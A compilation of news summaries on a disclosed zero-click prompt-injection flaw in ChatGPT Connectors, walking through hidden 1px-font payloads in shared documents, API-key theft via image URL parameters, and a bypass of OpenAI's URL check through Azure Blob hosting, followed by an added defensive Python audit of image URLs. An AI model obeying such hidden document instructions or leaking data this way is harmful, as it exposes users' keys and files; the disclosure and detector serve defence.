Zero-click attack
ChatGPT hit by a "zero-click attack": API keys easily leaked, OpenAI has not yet fixed it
3 6 Ke· 2025-08-12 10:08
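Danger! ChatGPT has a "zero-click attack" security problem.
Without the user clicking anything, an attacker can steal sensitive data, even API keys, from third-party applications connected to ChatGPT. So says an article published by Tamir Ishay Sharbat, who researches software security.
OpenAI is aware of this vulnerability and has taken preventive measures, but these still cannot stop attackers from getting in by other methods. Some commenters online also point out that this is a security problem at scale.
By injecting malicious prompts into documents transferred into connected third-party applications (such as Google Drive and SharePoint), the attacker causes ChatGPT, while searching and processing documents, to unknowingly send sensitive information to an attacker-controlled server as parameters of an image URL. In this way the attacker can steal sensitive data, even API keys. The detailed technical process is as follows.
Intrusion process
The user uploads a document directly to ChatGPT to have it analyzed and to get an answer. Let's look at what is going on.
How the attack chain forms
This vulnerability arises at the stage where ChatGPT connects to third-party applications. The attacker injects malicious instructions into a document, that is, an invisible prompt-injection payload (for example, hidden in the document in 1px white font), then waits for someone to upload it to ChatGPT and have it processed, so that the AI is induced to execute ...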
ChatGPT hit by a "zero-click attack": API keys easily leaked, OpenAI has not yet fixed it
量子位· 2025-08-12 09:35
Core Viewpoint
- ChatGPT has a significant security vulnerability known as a "zero-click attack," which allows attackers to steal sensitive data without user interaction [1][2][5].
Group 1: Attack Mechanism
- The vulnerability arises when ChatGPT connects to third-party applications, where attackers can inject malicious prompts into documents uploaded by users [9][10].
- Attackers can embed invisible payloads in documents, prompting ChatGPT to inadvertently send sensitive information to the attacker's server [14][18].
- The attack can be executed by malicious insiders who can easily manipulate accessible documents, increasing the likelihood of successful indirect prompt injection [16][17].
Group 2: Data Exfiltration
- Attackers can use image rendering to exfiltrate data, embedding sensitive information in image URL parameters that are sent to the attacker's server when ChatGPT renders the image [20][24].
- The process involves instructing ChatGPT to search for API keys in connected services like Google Drive and send them to the attacker's endpoint [29][30].
Group 3: OpenAI's Mitigation Efforts
- OpenAI is aware of the vulnerability and has implemented measures to check URLs for safety before rendering images [32][33].
- However, attackers have found ways to bypass these measures by using trusted services like Azure Blob for image hosting, which logs requests and parameters [37][38].
Group 4: Broader Implications and Recommendations
- The security issue poses a significant risk to enterprises, potentially leading to the leakage of sensitive documents and data [46].
- Experts recommend strict access controls, monitoring solutions tailored for AI activities, and user education on the risks of uploading unknown documents [48].
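As an added example (not from the article or from OpenAI), here is a defender-side audit of the image-URL channel described in Groups 2 and 3: it inspects markdown image URLs in assistant output before rendering and checks query parameters even on allowlisted hosts, because a trusted host that logs requests still records them. The host names, secret pattern, thresholds and sample output are constructed assumptions.

```python
import math
import re
from urllib.parse import urlsplit, parse_qsl

# Markdown image syntax ![alt](url ...): capture the URL up to whitespace or ")".
IMG_RE = re.compile(r"!\[[^\]]*\]\(\s*([^)\s]+)")
# Assumed secret shapes for illustration; extend with your own key formats.
SECRET_RE = re.compile(r"(?:sk|pk|key|token)[-_][A-Za-z0-9_\-]{16,}", re.I)
MAX_PARAM_LEN = 32   # assumed threshold: longer values get an entropy check
MIN_ENTROPY = 3.5    # assumed threshold, bits per character

def shannon_entropy(s):
    """Bits per character of s (0.0 for an empty string)."""
    if not s:
        return 0.0
    return -sum((s.count(c) / len(s)) * math.log2(s.count(c) / len(s)) for c in set(s))

def audit_image_urls(model_output, allowed_hosts):
    """Return [(url, [reasons])] for image URLs that should be blocked, not rendered."""
    findings = []
    for match in IMG_RE.finditer(model_output):
        url = match.group(1)
        parts = urlsplit(url)
        reasons = []
        if parts.hostname not in allowed_hosts:
            reasons.append("host-not-allowlisted")
        # Checked even for allowlisted hosts: a trusted host that logs requests
        # still records whatever is placed in the query string.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if SECRET_RE.search(value):
                reasons.append(f"secret-like-param:{name}")
            elif len(value) > MAX_PARAM_LEN and shannon_entropy(value) > MIN_ENTROPY:
                reasons.append(f"high-entropy-param:{name}")
        if reasons:
            findings.append((url, reasons))
    return findings

# Constructed sample: assistant output with one benign and two suspicious images.
ALLOWED_HOSTS = {"storage.example.com"}
SAMPLE_OUTPUT = (
    "![logo](https://storage.example.com/logo.png?v=3)\n"
    "![](https://storage.example.com/p.png?d=sk-CONSTRUCTED0000000000000000)\n"
    "![](https://unknown.example.net/p.png?q=Q29uc3RydWN0ZWQgc2FtcGxlIGRvY3VtZW50IHRleHQ)\n"
)

if __name__ == "__main__":
    for url, reasons in audit_image_urls(SAMPLE_OUTPUT, ALLOWED_HOSTS):
        print(reasons, url)
```

Legitimate signed URLs also carry long random parameters, so the entropy rule is better used to hold an image for review than as a hard block.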
ChatGPT Connectors vulnerability disclosed: sensitive data can be stolen with no user action
Huan Qiu Wang Zi Xun· 2025-08-07 08:10
Core Insights
- Security researchers have disclosed a vulnerability in OpenAI's Connectors that allows attackers to extract sensitive information from Google Drive accounts without user interaction [1][3]
- The vulnerability is classified as a "zero-click" attack, requiring only the user's email and shared documents to execute [3]
- OpenAI has implemented mitigation measures after being informed of the vulnerability earlier this year, although they have not publicly commented on the issue [3]
Company Overview
- Connectors is a feature launched by OpenAI for ChatGPT, enabling users to integrate tools and data, search files, pull real-time data, and reference content [3]
- The feature currently supports at least 17 different services [3]
Security Implications
- The attack can only extract limited data per instance and cannot remove entire documents [3]
- The rapid response from OpenAI indicates a proactive approach to security following the discovery of the vulnerability [3]